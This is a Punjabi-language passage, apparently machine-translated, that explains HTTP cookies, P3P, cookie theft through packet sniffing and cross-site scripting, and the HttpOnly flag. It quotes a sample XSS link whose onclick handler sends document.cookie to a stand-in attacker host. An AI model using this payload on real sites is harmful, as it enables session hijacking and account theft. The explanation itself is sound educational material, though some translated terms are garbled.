ਗੋਪਨੀਯਤਾ ਨੀਤੀਆਂ ਦੀ ਉਪਭੋਗਤਾ ਦੀਆਂ ਤਰਜੀਹਾਂ ਨਾਲ ਤੁਲਨਾ ਕਰਕੇ ਜਾਂ ਸਰਵਰ ਦੁਆਰਾ ਘੋਸ਼ਿਤ ਗੋਪਨੀਯਤਾ ਨੀਤੀ ਗੋਪਨੀਯਤਾ ਕਥਨ ਨੂੰ ਪੇਸ਼ ਕਰਕੇ ਉਪਭੋਗਤਾ ਨੂੰ ਪੁੱਛ ਕੇ ਕੂਕੀਜ਼ ਨੂੰ ਸਵੀਕਾਰ ਜਾਂ ਅਸਵੀਕਾਰ ਕਰ ਸਕਦਾ ਹੈ।
Apple Safari ਅਤੇ Microsoft Internet Explorer ਸੰਸਕਰਣ 6 ਅਤੇ 7 ਸਮੇਤ ਬਹੁਤ ਸਾਰੇ ਬ੍ਰਾਊਜ਼ਰ, P3P ਦਾ ਸਮਰਥਨ ਕਰਦੇ ਹਨ ਜੋ ਬ੍ਰਾਊਜ਼ਰ ਨੂੰ ਇਹ ਨਿਰਧਾਰਤ ਕਰਨ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦਾ ਹੈ ਕਿ ਤੀਜੀ ਧਿਰ ਕੂਕੀ ਸਟੋਰੇਜ ਨੂੰ ਸਵੀਕਾਰ ਕਰਨਾ ਹੈ ਜਾਂ ਨਹੀਂ। ਓਪੇਰਾ ਬ੍ਰਾਊਜ਼ਰ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਤੀਜੀ-ਧਿਰ ਦੀਆਂ ਕੂਕੀਜ਼ ਤੋਂ ਇਨਕਾਰ ਕਰਨ ਅਤੇ ਇੰਟਰਨੈਟ ਡੋਮੇਨਾਂ ਲਈ ਇੱਕ ਗਲੋਬਲ ਅਤੇ ਖਾਸ ਸੁਰੱਖਿਆ ਪ੍ਰੋਫਾਈਲ ਬਣਾਉਣ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦਾ ਹੈ। ਮੋਜ਼ੀਲਾ ਫਾਇਰਫਾਕਸ ਸੰਸਕਰਣ 2 ਨੇ P3P ਸਮਰਥਨ ਛੱਡ ਦਿੱਤਾ ਪਰ ਇਸਨੂੰ ਸੰਸਕਰਣ 3 ਵਿੱਚ ਬਹਾਲ ਕੀਤਾ।
ਉਪਭੋਗਤਾ ਦੇ ਵੈੱਬ ਅਨੁਭਵ ਨੂੰ ਨਕਾਰਾਤਮਕ ਤੌਰ 'ਤੇ ਪ੍ਰਭਾਵਿਤ ਕੀਤੇ ਬਿਨਾਂ, ਗੋਪਨੀਯਤਾ ਨੂੰ ਵਧਾਉਣ ਅਤੇ ਵਿਗਿਆਪਨ ਟਰੈਕਿੰਗ ਨੂੰ ਘਟਾਉਣ ਲਈ ਜ਼ਿਆਦਾਤਰ ਬ੍ਰਾਊਜ਼ਰਾਂ ਦੁਆਰਾ ਤੀਜੀ-ਧਿਰ ਦੀਆਂ ਕੂਕੀਜ਼ ਨੂੰ ਬਲੌਕ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ। ਕਈ ਵਿਗਿਆਪਨ ਏਜੰਸੀਆਂ ਇੱਕ ਵਿਕਲਪ ਪੇਸ਼ ਕਰਦੀਆਂ ਹਨ ਬਾਹਰ ਕੱਡਣਾ ਟਾਰਗੇਟ ਵਿਗਿਆਪਨ ਲਈ, ਬ੍ਰਾਊਜ਼ਰ ਵਿੱਚ ਇੱਕ ਜੈਨਰਿਕ ਕੂਕੀ ਸਥਾਪਤ ਕਰਕੇ ਜੋ ਇਸ ਟਾਰਗੇਟਿੰਗ ਨੂੰ ਅਕਿਰਿਆਸ਼ੀਲ ਕਰ ਦਿੰਦਾ ਹੈ, ਪਰ ਅਜਿਹਾ ਹੱਲ ਅਮਲੀ ਤੌਰ 'ਤੇ ਪ੍ਰਭਾਵਸ਼ਾਲੀ ਨਹੀਂ ਹੁੰਦਾ, ਜਦੋਂ ਇਸਦਾ ਸਤਿਕਾਰ ਕੀਤਾ ਜਾਂਦਾ ਹੈ, ਕਿਉਂਕਿ ਇਹ ਜੈਨਰਿਕ ਕੂਕੀ ਮਿਟ ਜਾਂਦੀ ਹੈ ਜਿਵੇਂ ਹੀ ਉਪਭੋਗਤਾ ਇਹਨਾਂ ਕੂਕੀਜ਼ ਨੂੰ ਮਿਟਾ ਦਿੰਦਾ ਹੈ ਜੋ ਚੋਣ ਨੂੰ ਰੱਦ ਕਰਦਾ ਹੈ ਬਾਹਰ ਦਾ ਫੈਸਲਾ.
ਕੂਕੀਜ਼ ਦੇ ਨੁਕਸਾਨ
ਗੋਪਨੀਯਤਾ ਮੁੱਦਿਆਂ ਤੋਂ ਇਲਾਵਾ, ਕੂਕੀਜ਼ ਵਿੱਚ ਕੁਝ ਤਕਨੀਕੀ ਕਮੀਆਂ ਵੀ ਹਨ। ਖਾਸ ਤੌਰ 'ਤੇ, ਉਹ ਹਮੇਸ਼ਾ ਉਪਭੋਗਤਾਵਾਂ ਦੀ ਸਹੀ ਪਛਾਣ ਨਹੀਂ ਕਰਦੇ, ਉਹ ਸਾਈਟ ਦੀ ਕਾਰਗੁਜ਼ਾਰੀ ਨੂੰ ਹੌਲੀ ਕਰ ਸਕਦੇ ਹਨ ਜਦੋਂ ਵੱਡੀ ਗਿਣਤੀ ਵਿੱਚ, ਉਹਨਾਂ ਨੂੰ ਸੁਰੱਖਿਆ ਹਮਲਿਆਂ ਲਈ ਵਰਤਿਆ ਜਾ ਸਕਦਾ ਹੈ, ਅਤੇ ਉਹ ਪ੍ਰਤੀਨਿਧੀ ਰਾਜ ਟ੍ਰਾਂਸਫਰ, ਸੌਫਟਵੇਅਰ ਦੀ ਆਰਕੀਟੈਕਚਰਲ ਸ਼ੈਲੀ ਨਾਲ ਟਕਰਾਅ ਕਰਦੇ ਹਨ।
ਅਸਪਸ਼ਟ ਪਛਾਣ
ਜੇਕਰ ਇੱਕ ਕੰਪਿਊਟਰ 'ਤੇ ਇੱਕ ਤੋਂ ਵੱਧ ਬ੍ਰਾਊਜ਼ਰ ਵਰਤੇ ਜਾਂਦੇ ਹਨ, ਤਾਂ ਉਹਨਾਂ ਵਿੱਚੋਂ ਹਰੇਕ ਵਿੱਚ ਹਮੇਸ਼ਾ ਕੂਕੀਜ਼ ਲਈ ਇੱਕ ਵੱਖਰੀ ਸਟੋਰੇਜ ਯੂਨਿਟ ਹੁੰਦੀ ਹੈ। ਇਸ ਲਈ ਕੂਕੀਜ਼ ਕਿਸੇ ਵਿਅਕਤੀ ਦੀ ਪਛਾਣ ਨਹੀਂ ਕਰਦੀਆਂ, ਪਰ ਇੱਕ ਉਪਭੋਗਤਾ ਖਾਤੇ, ਇੱਕ ਕੰਪਿਊਟਰ, ਅਤੇ ਇੱਕ ਵੈਬ ਬ੍ਰਾਊਜ਼ਰ ਦਾ ਸੁਮੇਲ। ਇਸ ਤਰ੍ਹਾਂ, ਕੋਈ ਵੀ ਇਨ੍ਹਾਂ ਖਾਤਿਆਂ, ਕੰਪਿਊਟਰਾਂ ਜਾਂ ਬ੍ਰਾਊਜ਼ਰਾਂ ਦੀ ਵਰਤੋਂ ਕਰ ਸਕਦਾ ਹੈ ਜਿਨ੍ਹਾਂ ਕੋਲ ਕੂਕੀਜ਼ ਦੀ ਪੈਨੋਪਲੀ ਹੈ। ਇਸੇ ਤਰ੍ਹਾਂ, ਕੂਕੀਜ਼ ਇੱਕੋ ਉਪਭੋਗਤਾ ਖਾਤੇ, ਕੰਪਿਊਟਰ ਅਤੇ ਬ੍ਰਾਊਜ਼ਰ ਨੂੰ ਸਾਂਝਾ ਕਰਨ ਵਾਲੇ ਮਲਟੀਪਲ ਉਪਭੋਗਤਾਵਾਂ ਵਿੱਚ ਫਰਕ ਨਹੀਂ ਕਰਦੇ, ਜਿਵੇਂ ਕਿ "ਇੰਟਰਨੈਟ ਕੈਫੇ" ਜਾਂ ਕੰਪਿਊਟਰ ਸਰੋਤਾਂ ਤੱਕ ਮੁਫ਼ਤ ਪਹੁੰਚ ਦੇਣ ਵਾਲੀ ਕਿਸੇ ਵੀ ਥਾਂ ਵਿੱਚ।
ਪਰ ਅਭਿਆਸ ਵਿੱਚ ਇਹ ਕਥਨ ਜ਼ਿਆਦਾਤਰ ਮਾਮਲਿਆਂ ਵਿੱਚ ਗਲਤ ਸਾਬਤ ਹੁੰਦਾ ਹੈ ਕਿਉਂਕਿ ਅੱਜ ਇੱਕ "ਨਿੱਜੀ" ਕੰਪਿਊਟਰ (ਜਾਂ ਇੱਕ ਸਮਾਰਟਫ਼ੋਨ, ਜਾਂ ਟੈਬਲੈੱਟ, ਜੋ ਕਿ ਬਦਤਰ ਹੈ) ਦੀ ਵਰਤੋਂ ਮੁੱਖ ਤੌਰ 'ਤੇ ਇੱਕ ਵਿਅਕਤੀ ਦੁਆਰਾ ਕੀਤੀ ਜਾਂਦੀ ਹੈ। ਇਹ ਕਿਸੇ ਖਾਸ ਵਿਅਕਤੀ ਨੂੰ ਨਿਸ਼ਾਨਾ ਬਣਾਉਣ ਦੇ ਬਰਾਬਰ ਹੈ ਇਕੱਠੀ ਕੀਤੀ ਗਈ ਜਾਣਕਾਰੀ ਦੀ ਮਾਤਰਾ ਦੁਆਰਾ ਵਿਅਕਤੀਗਤ ਨਿਸ਼ਾਨੇ 'ਤੇ ਪਹੁੰਚ ਜਾਂਦੀ ਹੈ ਭਾਵੇਂ ਵਿਅਕਤੀ ਦੀ ਪਛਾਣ "ਨਾਮ" ਨਾ ਕੀਤੀ ਗਈ ਹੋਵੇ।
ਕੂਕੀਜ਼ ਦੀ ਚੋਰੀ
ਨੈੱਟਵਰਕ 'ਤੇ ਕਿਸੇ ਹੋਰ ਕੰਪਿਊਟਰ ਦੁਆਰਾ ਇੱਕ ਕੂਕੀ ਚੋਰੀ ਕੀਤੀ ਜਾ ਸਕਦੀ ਹੈ।
ਆਮ ਕਾਰਵਾਈ ਦੇ ਦੌਰਾਨ, ਕੂਕੀਜ਼ ਨੂੰ ਸਰਵਰ (ਜਾਂ ਉਸੇ ਡੋਮੇਨ ਵਿੱਚ ਸਰਵਰਾਂ ਦੇ ਸਮੂਹ) ਅਤੇ ਉਪਭੋਗਤਾ ਦੇ ਕੰਪਿਊਟਰ ਬ੍ਰਾਊਜ਼ਰ ਦੇ ਵਿਚਕਾਰ ਵਾਪਸ ਭੇਜਿਆ ਜਾਂਦਾ ਹੈ। ਕਿਉਂਕਿ ਕੂਕੀਜ਼ ਵਿੱਚ ਸੰਵੇਦਨਸ਼ੀਲ ਜਾਣਕਾਰੀ (ਉਪਭੋਗਤਾ ਨਾਮ, ਪ੍ਰਮਾਣੀਕਰਨ ਲਈ ਵਰਤਿਆ ਜਾਣ ਵਾਲਾ ਪਾਸਵਰਡ, ਆਦਿ) ਹੋ ਸਕਦਾ ਹੈ, ਉਹਨਾਂ ਦੇ ਮੁੱਲ ਦੂਜੇ ਕੰਪਿਊਟਰਾਂ ਤੱਕ ਪਹੁੰਚਯੋਗ ਨਹੀਂ ਹੋਣੇ ਚਾਹੀਦੇ ਹਨ। ਕੂਕੀ ਦੀ ਚੋਰੀ ਇੱਕ ਅਣਅਧਿਕਾਰਤ ਤੀਜੀ ਧਿਰ ਦੁਆਰਾ ਕੂਕੀਜ਼ ਨੂੰ ਰੋਕਣ ਦਾ ਕੰਮ ਹੈ।
ਕੂਕੀਜ਼ ਨੂੰ ਸੈਸ਼ਨ ਹਾਈਜੈਕਿੰਗ ਕਹਿੰਦੇ ਹੋਏ ਹਮਲੇ ਵਿੱਚ ਇੱਕ ਪੈਕੇਟ ਸਨਿਫਰ ਦੁਆਰਾ ਚੋਰੀ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ। ਨੈੱਟ 'ਤੇ ਟ੍ਰੈਫਿਕ ਨੂੰ ਭੇਜਣ ਅਤੇ ਪ੍ਰਾਪਤ ਕਰਨ ਵਾਲੇ ਕੰਪਿਊਟਰਾਂ ਤੋਂ ਇਲਾਵਾ ਹੋਰ ਕੰਪਿਊਟਰਾਂ ਦੁਆਰਾ ਰੋਕਿਆ ਅਤੇ ਪੜ੍ਹਿਆ ਜਾ ਸਕਦਾ ਹੈ (ਖਾਸ ਤੌਰ 'ਤੇ ਅਣ-ਇਨਕ੍ਰਿਪਟਡ ਜਨਤਕ Wi-Fi ਸਪੇਸ 'ਤੇ)। ਇਸ ਟ੍ਰੈਫਿਕ ਵਿੱਚ ਸਾਦੇ HTTP ਪ੍ਰੋਟੋਕੋਲ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹੋਏ ਸੈਸ਼ਨਾਂ ਉੱਤੇ ਭੇਜੀਆਂ ਗਈਆਂ ਕੂਕੀਜ਼ ਸ਼ਾਮਲ ਹਨ। ਜਦੋਂ ਨੈੱਟਵਰਕ ਟ੍ਰੈਫਿਕ ਨੂੰ ਏਨਕ੍ਰਿਪਟ ਨਹੀਂ ਕੀਤਾ ਜਾਂਦਾ ਹੈ, ਤਾਂ ਖਤਰਨਾਕ ਉਪਭੋਗਤਾ ਇਸ ਤਰ੍ਹਾਂ "ਪੈਕੇਟ ਸਨੀਫਰਸ" ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹੋਏ ਨੈੱਟਵਰਕ 'ਤੇ ਦੂਜੇ ਉਪਭੋਗਤਾਵਾਂ ਦੇ ਸੰਚਾਰ ਨੂੰ ਪੜ੍ਹ ਸਕਦੇ ਹਨ।
HTTPS ਪ੍ਰੋਟੋਕੋਲ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹੋਏ ਉਪਭੋਗਤਾ ਦੇ ਕੰਪਿਊਟਰ ਅਤੇ ਸਰਵਰ ਵਿਚਕਾਰ ਕਨੈਕਸ਼ਨ ਨੂੰ ਐਨਕ੍ਰਿਪਟ ਕਰਕੇ ਇਸ ਸਮੱਸਿਆ ਨੂੰ ਦੂਰ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ। ਇੱਕ ਸਰਵਰ ਨਿਰਧਾਰਤ ਕਰ ਸਕਦਾ ਹੈ a ਸੁਰੱਖਿਅਤ ਝੰਡਾ ਕੂਕੀ ਸੈਟ ਕਰਦੇ ਸਮੇਂ; ਬ੍ਰਾਊਜ਼ਰ ਇਸਨੂੰ ਸਿਰਫ਼ ਇੱਕ ਸੁਰੱਖਿਅਤ ਲਾਈਨ ਉੱਤੇ ਭੇਜੇਗਾ, ਜਿਵੇਂ ਕਿ ਇੱਕ SSL ਕੁਨੈਕਸ਼ਨ।
ਹਾਲਾਂਕਿ ਬਹੁਤ ਸਾਰੀਆਂ ਸਾਈਟਾਂ, ਹਾਲਾਂਕਿ ਉਪਭੋਗਤਾ ਪ੍ਰਮਾਣਿਕਤਾ (ਜਿਵੇਂ ਕਿ ਲੌਗਇਨ ਪੰਨਾ) ਲਈ HTTPS ਏਨਕ੍ਰਿਪਟਡ ਸੰਚਾਰ ਦੀ ਵਰਤੋਂ ਕਰਦੀਆਂ ਹਨ, ਬਾਅਦ ਵਿੱਚ ਕੁਸ਼ਲਤਾ ਕਾਰਨਾਂ ਕਰਕੇ ਗੈਰ-ਇਨਕ੍ਰਿਪਟਡ HTTP ਕਨੈਕਸ਼ਨਾਂ ਰਾਹੀਂ, ਆਮ ਵਾਂਗ ਸੈਸ਼ਨ ਕੂਕੀਜ਼ ਅਤੇ ਹੋਰ ਡੇਟਾ ਭੇਜਦੀਆਂ ਹਨ। ਹਮਲਾਵਰ ਇਸ ਤਰ੍ਹਾਂ ਦੂਜੇ ਉਪਭੋਗਤਾਵਾਂ ਦੀਆਂ ਕੂਕੀਜ਼ ਨੂੰ ਰੋਕ ਸਕਦੇ ਹਨ ਅਤੇ ਉਹਨਾਂ ਨੂੰ ਉਚਿਤ ਸਾਈਟਾਂ 'ਤੇ ਨਕਲ ਕਰ ਸਕਦੇ ਹਨ ਜਾਂ ਕੂਕੀ ਹਮਲਿਆਂ ਵਿੱਚ ਉਹਨਾਂ ਦੀ ਵਰਤੋਂ ਕਰ ਸਕਦੇ ਹਨ।
ਸਾਈਟ ਵਿੱਚ ਸਕ੍ਰਿਪਟਿੰਗ: ਇੱਕ ਕੂਕੀ ਜੋ ਸਿਰਫ਼ ਸਰਵਰ ਅਤੇ ਕਲਾਇੰਟ ਵਿਚਕਾਰ ਬਦਲੀ ਹੋਣੀ ਚਾਹੀਦੀ ਹੈ ਕਿਸੇ ਹੋਰ ਤੀਜੀ ਧਿਰ ਨੂੰ ਭੇਜੀ ਜਾਂਦੀ ਹੈ।
ਕੂਕੀਜ਼ ਚੋਰੀ ਕਰਨ ਦਾ ਇੱਕ ਹੋਰ ਤਰੀਕਾ ਹੈ ਸਕ੍ਰਿਪਟ ਸਾਈਟਾਂ ਅਤੇ ਬ੍ਰਾਊਜ਼ਰ ਨੂੰ ਖੁਦ ਕੁਕੀਜ਼ ਨੂੰ ਖਤਰਨਾਕ ਸਰਵਰਾਂ 'ਤੇ ਭੇਜਣਾ ਹੈ ਜੋ ਉਹਨਾਂ ਨੂੰ ਕਦੇ ਪ੍ਰਾਪਤ ਨਹੀਂ ਕਰਦੇ। ਆਧੁਨਿਕ ਬ੍ਰਾਊਜ਼ਰ ਸਰਵਰ ਤੋਂ ਕੋਡ ਦੇ ਮੰਗੇ ਗਏ ਹਿੱਸਿਆਂ ਨੂੰ ਲਾਗੂ ਕਰਨ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦੇ ਹਨ। ਜੇਕਰ ਕੂਕੀਜ਼ ਨੂੰ ਰਨਟਾਈਮ ਦੌਰਾਨ ਐਕਸੈਸ ਕੀਤਾ ਜਾਂਦਾ ਹੈ, ਤਾਂ ਉਹਨਾਂ ਦੇ ਮੁੱਲ ਉਹਨਾਂ ਸਰਵਰਾਂ ਨੂੰ ਕਿਸੇ ਰੂਪ ਵਿੱਚ ਸੰਚਾਰਿਤ ਕੀਤੇ ਜਾ ਸਕਦੇ ਹਨ ਜਿਹਨਾਂ ਨੂੰ ਉਹਨਾਂ ਤੱਕ ਪਹੁੰਚ ਨਹੀਂ ਕਰਨੀ ਚਾਹੀਦੀ। ਕੂਕੀਜ਼ ਨੂੰ ਨੈੱਟਵਰਕ ਉੱਤੇ ਭੇਜੇ ਜਾਣ ਤੋਂ ਪਹਿਲਾਂ ਐਨਕ੍ਰਿਪਟ ਕਰਨਾ ਹਮਲੇ ਨੂੰ ਨਾਕਾਮ ਕਰਨ ਵਿੱਚ ਮਦਦ ਨਹੀਂ ਕਰਦਾ।
ਇਸ ਕਿਸਮ ਦੀ ਇਨ-ਸਾਈਟ ਸਕ੍ਰਿਪਟਿੰਗ ਆਮ ਤੌਰ 'ਤੇ ਸਾਈਟਾਂ 'ਤੇ ਹਮਲਾਵਰਾਂ ਦੁਆਰਾ ਵਰਤੀ ਜਾਂਦੀ ਹੈ ਜੋ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ HTML ਸਮੱਗਰੀ ਪੋਸਟ ਕਰਨ ਦੀ ਆਗਿਆ ਦਿੰਦੀਆਂ ਹਨ। HTML ਯੋਗਦਾਨ ਵਿੱਚ ਅਨੁਕੂਲ ਕੋਡ ਦੇ ਇੱਕ ਹਿੱਸੇ ਨੂੰ ਜੋੜ ਕੇ, ਇੱਕ ਹਮਲਾਵਰ ਦੂਜੇ ਉਪਭੋਗਤਾਵਾਂ ਤੋਂ ਕੂਕੀਜ਼ ਪ੍ਰਾਪਤ ਕਰ ਸਕਦਾ ਹੈ। ਇਹਨਾਂ ਕੂਕੀਜ਼ ਦੇ ਗਿਆਨ ਦੀ ਵਰਤੋਂ ਚੋਰੀ ਕੀਤੀਆਂ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਉਸੇ ਸਾਈਟ ਨਾਲ ਕਨੈਕਟ ਕਰਕੇ ਕੀਤੀ ਜਾ ਸਕਦੀ ਹੈ, ਇਸ ਤਰ੍ਹਾਂ ਉਸ ਉਪਭੋਗਤਾ ਵਜੋਂ ਪਛਾਣਿਆ ਜਾ ਸਕਦਾ ਹੈ ਜਿਸ ਦੀਆਂ ਕੂਕੀਜ਼ ਚੋਰੀ ਕੀਤੀਆਂ ਗਈਆਂ ਸਨ।
ਅਜਿਹੇ ਹਮਲਿਆਂ ਨੂੰ ਰੋਕਣ ਦਾ ਇੱਕ ਤਰੀਕਾ ਹੈ HttpOnly ਫਲੈਗ ਦੀ ਵਰਤੋਂ ਕਰਨਾ; ਇਹ ਇੱਕ ਵਿਕਲਪ ਹੈ, ਜੋ ਕਿ PHP ਵਿੱਚ ਇੰਟਰਨੈੱਟ ਐਕਸਪਲੋਰਰ ਦੇ ਸੰਸਕਰਣ 6 ਤੋਂ ਬਾਅਦ ਸੰਸਕਰਣ 5.2.0 ਤੋਂ ਪੇਸ਼ ਕੀਤਾ ਗਿਆ ਹੈ ਜੋ ਕਿ ਕੂਕੀ ਨੂੰ ਸਕ੍ਰਿਪਟ ਦੇ ਨੇੜੇ ਕਲਾਇੰਟ ਲਈ ਪਹੁੰਚਯੋਗ ਬਣਾਉਣ ਦੀ ਯੋਜਨਾ ਹੈ। ਹਾਲਾਂਕਿ, ਵੈਬ ਡਿਵੈਲਪਰਾਂ ਨੂੰ ਆਪਣੀ ਸਾਈਟ ਦੇ ਵਿਕਾਸ ਵਿੱਚ ਇਸ ਨੂੰ ਧਿਆਨ ਵਿੱਚ ਰੱਖਣਾ ਚਾਹੀਦਾ ਹੈ ਤਾਂ ਜੋ ਉਹ ਸਾਈਟ ਵਿੱਚ ਸਕ੍ਰਿਪਟਿੰਗ ਤੋਂ ਮੁਕਤ ਹੋਣ।
ਇੱਕ ਹੋਰ ਸੁਰੱਖਿਆ ਖ਼ਤਰਾ ਵਰਤਿਆ ਜਾਂਦਾ ਹੈ ਸਾਈਟ ਵਿੱਚ ਮੰਗ ਬਣਾਉਣਾ।
ਅਧਿਕਾਰਤ ਤਕਨੀਕੀ ਨਿਰਧਾਰਨ ਕੁਕੀਜ਼ ਨੂੰ ਸਿਰਫ਼ ਉਸ ਡੋਮੇਨ ਦੇ ਸਰਵਰਾਂ ਨੂੰ ਵਾਪਸ ਭੇਜਣ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦਾ ਹੈ ਜਿੱਥੋਂ ਉਹ ਉਤਪੰਨ ਹੋਏ ਹਨ। ਹਾਲਾਂਕਿ, ਕੂਕੀਜ਼ ਦੇ ਮੁੱਲ ਨੂੰ ਕੂਕੀ ਸਿਰਲੇਖਾਂ ਤੋਂ ਇਲਾਵਾ ਹੋਰ ਸਾਧਨਾਂ ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਦੂਜੇ ਸਰਵਰਾਂ ਨੂੰ ਭੇਜਿਆ ਜਾ ਸਕਦਾ ਹੈ।
ਖਾਸ ਤੌਰ 'ਤੇ, JavaScript ਵਰਗੀਆਂ ਸਕ੍ਰਿਪਟਿੰਗ ਭਾਸ਼ਾਵਾਂ ਨੂੰ ਆਮ ਤੌਰ 'ਤੇ ਕੂਕੀ ਮੁੱਲਾਂ ਤੱਕ ਪਹੁੰਚ ਕਰਨ ਦੀ ਇਜਾਜ਼ਤ ਦਿੱਤੀ ਜਾਂਦੀ ਹੈ ਅਤੇ ਇੰਟਰਨੈਟ 'ਤੇ ਕਿਸੇ ਵੀ ਸਰਵਰ ਨੂੰ ਮਨਮਾਨੇ ਮੁੱਲ ਭੇਜਣ ਦੇ ਯੋਗ ਹੁੰਦੇ ਹਨ। ਇਹ ਸਕ੍ਰਿਪਟਿੰਗ ਸਮਰੱਥਾ ਉਹਨਾਂ ਵੈਬਸਾਈਟਾਂ ਤੋਂ ਵਰਤੀ ਜਾਂਦੀ ਹੈ ਜੋ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਦੂਜੇ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਵੇਖਣ ਲਈ HTML ਸਮੱਗਰੀ ਪੋਸਟ ਕਰਨ ਦੀ ਆਗਿਆ ਦਿੰਦੀਆਂ ਹਨ।
ਉਦਾਹਰਨ ਲਈ, example.com ਡੋਮੇਨ 'ਤੇ ਕੰਮ ਕਰਨ ਵਾਲਾ ਹਮਲਾਵਰ ਇੱਕ ਪ੍ਰਸਿੱਧ ਬਲੌਗ ਵੱਲ ਇਸ਼ਾਰਾ ਕਰਦੇ ਹੋਏ ਹੇਠਾਂ ਦਿੱਤੇ ਲਿੰਕ ਵਾਲੀ ਟਿੱਪਣੀ ਪੋਸਟ ਕਰ ਸਕਦਾ ਹੈ ਜਿਸ ਨੂੰ ਉਹ ਕੰਟਰੋਲ ਨਹੀਂ ਕਰਦੇ ਹਨ:
<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>
ਜਦੋਂ ਕੋਈ ਹੋਰ ਉਪਭੋਗਤਾ ਇਸ ਲਿੰਕ 'ਤੇ ਕਲਿੱਕ ਕਰਦਾ ਹੈ, ਤਾਂ ਬ੍ਰਾਊਜ਼ਰ ਕੋਡ ਦੇ ਔਨਕਲਿਕ ਵਿਸ਼ੇਸ਼ਤਾ ਵਾਲੇ ਹਿੱਸੇ ਨੂੰ ਲਾਗੂ ਕਰਦਾ ਹੈ, ਇਸਲਈ ਇਹ document.cookie ਸਟ੍ਰਿੰਗ ਨੂੰ ਉਪਭੋਗਤਾ ਕੂਕੀਜ਼ ਦੀ ਸੂਚੀ ਨਾਲ ਬਦਲ ਦਿੰਦਾ ਹੈ ਜੋ ਇਸ ਪੰਨੇ ਲਈ ਕਿਰਿਆਸ਼ੀਲ ਹਨ। ਇਸ ਲਈ, ਕੂਕੀਜ਼ ਦੀ ਇਹ ਸੂਚੀ example.com ਸਰਵਰ ਨੂੰ ਭੇਜੀ ਜਾਂਦੀ ਹੈ, ਅਤੇ ਹਮਲਾਵਰ ਇਸ ਲਈ ਇਸ ਉਪਭੋਗਤਾ ਦੀਆਂ ਕੂਕੀਜ਼ ਨੂੰ ਇਕੱਠਾ ਕਰਨ ਦੇ ਯੋਗ ਹੁੰਦਾ ਹੈ।
ਇਸ ਕਿਸਮ ਦੇ ਹਮਲੇ ਨੂੰ ਉਪਭੋਗਤਾ ਵਾਲੇ ਪਾਸੇ ਖੋਜਣਾ ਮੁਸ਼ਕਲ ਹੈ ਕਿਉਂਕਿ ਸਕ੍ਰਿਪਟ ਉਸੇ ਡੋਮੇਨ ਤੋਂ ਆਉਂਦੀ ਹੈ ਜੋ ਕੂਕੀ ਨੂੰ ਸੈੱਟ ਕਰਦੀ ਹੈ, ਅਤੇ ਮੁੱਲਾਂ ਨੂੰ ਭੇਜਣ ਲਈ ਕਾਰਵਾਈ ਉਸ ਡੋਮੇਨ ਦੁਆਰਾ ਅਧਿਕਾਰਤ ਪ੍ਰਤੀਤ ਹੁੰਦੀ ਹੈ। ਇਹ ਮੰਨਿਆ ਜਾਂਦਾ ਹੈ ਕਿ ਇਸ ਕਿਸਮ ਦੀ ਸਾਈਟ ਨੂੰ ਚਲਾਉਣ ਵਾਲੇ ਪ੍ਰਬੰਧਕਾਂ ਦੀ ਜ਼ਿੰਮੇਵਾਰੀ ਹੈ ਕਿ ਉਹ ਖਤਰਨਾਕ ਕੋਡ ਦੇ ਪ੍ਰਕਾਸ਼ਨ ਨੂੰ ਰੋਕਣ ਲਈ ਪਾਬੰਦੀਆਂ ਲਗਾਉਣ।
ਕੂਕੀਜ਼ JavaScript ਵਰਗੇ ਕਲਾਇੰਟ-ਸਾਈਡ ਪ੍ਰੋਗਰਾਮਾਂ ਨੂੰ ਸਿੱਧੇ ਤੌਰ 'ਤੇ ਦਿਖਾਈ ਨਹੀਂ ਦਿੰਦੀਆਂ ਜੇਕਰ ਉਹ HttpOnly ਫਲੈਗ ਨਾਲ ਭੇਜੀਆਂ ਗਈਆਂ ਸਨ। ਸਰਵਰ ਦੇ ਦ੍ਰਿਸ਼ਟੀਕੋਣ ਤੋਂ, ਸਿਰਫ ਫਰਕ ਇਹ ਹੈ ਕਿ ਸੈੱਟ-ਕੂਕੀ ਸਿਰਲੇਖ ਦੀ ਲਾਈਨ ਵਿੱਚ ਇੱਕ ਨਵਾਂ ਖੇਤਰ ਜੋੜਿਆ ਗਿਆ ਹੈ ਜਿਸ ਵਿੱਚ HttpOnly ਸਤਰ ਹੈ:
Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly
ਜਦੋਂ ਬ੍ਰਾਊਜ਼ਰ ਅਜਿਹੀ ਕੂਕੀ ਪ੍ਰਾਪਤ ਕਰਦਾ ਹੈ, ਤਾਂ ਇਹ ਇਸਨੂੰ ਆਮ ਤੌਰ 'ਤੇ ਹੇਠਾਂ ਦਿੱਤੇ HTTP ਐਕਸਚੇਂਜ ਵਿੱਚ ਵਰਤਣਾ ਚਾਹੀਦਾ ਹੈ, ਪਰ ਇਸਨੂੰ ਕਲਾਇੰਟ ਸਾਈਡ 'ਤੇ ਚਲਾਈਆਂ ਗਈਆਂ ਸਕ੍ਰਿਪਟਾਂ ਨੂੰ ਦਿਖਾਈ ਦੇਣ ਤੋਂ ਬਿਨਾਂ। HttpOnly ਫਲੈਗ ਕਿਸੇ ਅਧਿਕਾਰਤ ਤਕਨੀਕੀ ਨਿਰਧਾਰਨ ਦਾ ਹਿੱਸਾ ਨਹੀਂ ਹੈ, ਅਤੇ ਸਾਰੇ ਬ੍ਰਾਊਜ਼ਰਾਂ ਵਿੱਚ ਲਾਗੂ ਨਹੀਂ ਕੀਤਾ ਗਿਆ ਹੈ। ਨੋਟ ਕਰੋ ਕਿ XMLHTTPRequest 